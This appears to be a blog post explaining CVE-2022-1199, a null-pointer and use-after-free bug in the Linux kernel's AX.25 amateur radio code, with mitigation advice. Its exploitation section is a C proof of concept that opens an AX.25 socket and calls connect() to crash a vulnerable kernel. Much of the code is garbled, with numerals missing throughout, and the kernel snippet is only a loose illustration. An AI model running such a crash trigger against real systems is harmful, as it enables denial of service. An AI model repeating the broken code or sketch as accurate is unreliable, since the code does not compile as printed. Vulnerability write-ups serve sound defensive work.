CVE-2022-1199 - Crashing the Linux Kernel via Amateur Radio - Exploit Explained

The Linux Kernel is the heart of most modern operating systems used across the globe. When a critical vulnerability is found, especially one that lets an unprivileged user crash the kernel, it has serious implications for everything from home PCs to cloud servers.

In this post, we'll break down CVE-2022-1199, a critical flaw in the Linux hamradio framework that lets attackers crash Linux simply by faking amateur radio signals from userspace. We’ll explain the bug and then walk through an example of how this exploit can be triggered, in simple terms.

What is CVE-2022-1199?

CVE-2022-1199 is a security issue in the Linux kernel’s handling of the AX.25 protocol, which is used by amateur (ham) radio. This kernel module is not typically used by average desktop users, but because it ships in many default installations, attackers can often reach the code even if amateur radio is not in use.

The Flaw:  
The problem occurs because the AX.25 code does not properly check if certain objects exist before trying to access them. This results in two classic security bugs:

- Null Pointer Dereference – The kernel tries to access something at the zero address, which leads to an immediate system crash (kernel panic).
- Use After Free – In some code paths, the kernel accesses memory that has already been freed, which can also cause a crash and, in some cases, even let attackers run arbitrary code.

Where’s the Problem in the Code?

The bug originates in the code found in net/ax25/af_ax25.c. Here’s a simplified illustration of what’s going wrong (real code is more complex):

// Vulnerable function in net/ax25/af_ax25.c
static int ax25_connect(struct socket *sock, struct sockaddr *uaddr, int ulen, int flags)
{
    ax25_cb *ax25 = sock->sk->sk_protinfo; // gets ax25 control block

    // ... (lots of setup code)

    // Whoops! There’s no proper null check for ax25
    if (ax25->state == AX25_STATE_) {  // <---- crasher if ax25 is NULL
        // ... do stuff
    }

    // At other points, ax25 may have already been freed…
}

If a user triggers this code path with a carefully crafted call from user land — for example, via a normal connect() socket syscall — the kernel will panic.

Exploiting CVE-2022-1199: Triggering a Kernel Panic

An attacker doesn’t need access to special hardware. They just have to be able to create and interact with an AX.25 socket. On most Linux systems, this needs CAP_NET_RAW, but sometimes containers or configurations allow this setting.

Step 1: Open a Hamradio AX.25 Socket

// Exploit code needs to be compiled on a Linux machine with the ax25 kernel module loaded
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <linux/ax25.h>
#include <unistd.h>

int main()
{
    int sockfd;
    struct sockaddr_ax25 addr;

    sockfd = socket(AF_AX25, SOCK_DGRAM, ); // create AX.25 socket (hamradio)
    if (sockfd < )
    {
        perror("socket");
        return 1;
    }

    // setup a bogus ax25 address
    memset(&addr, , sizeof(addr));
    addr.sax25_family = AF_AX25;
    strcpy((char *)&addr.sax25_call, "NCALL"); // random callsign

    // Kernel will crash (null-pointer dereference) here if vulnerable
    if (connect(sockfd, (struct sockaddr *)&addr, sizeof(addr)) < )
    {
        perror("connect");
        close(sockfd);
        return 1;
    }

    // ...if system didn't crash, kernel is not vulnerable or patched!

    close(sockfd);
    return ;
}

> Warning: Running this on a vulnerable system will crash your machine. Only run in a safe, test environment!

References and Further Reading

- Main CVE: NVD entry for CVE-2022-1199
- Patch: Linux kernel commit fixing the flaw
- Bug Tracker: Red Hat Bugzilla - 2069443

Similar bugs:

- Exploit-DB: Null pointer dereference

Patch: Always run the most recent kernel available for your distribution.

- Mitigate: If you don’t use hamradio, consider blacklisting or unloading the AX.25 kernel module.

sudo modprobe -r ax25

<br>- <b>Restrict</b>: Limit who can load kernel modules and who has CAP_NET_RAW` capabilities.

---

## Conclusion

CVE-2022-1199 reminds us that even rarely used parts of the huge Linux kernel can be a risk. Attackers can exploit seemingly “niche” modules to take down a whole system, so keeping everything patched — even the hamradio stack — is a must.  
If your servers or endpoints have no reason to support amateur radio, consider disabling those modules entirely.

Stay safe, and keep those kernels up to date!

Timeline

Published on: 08/29/2022 15:15:00 UTC
Last modified on: 02/02/2023 17:12:00 UTC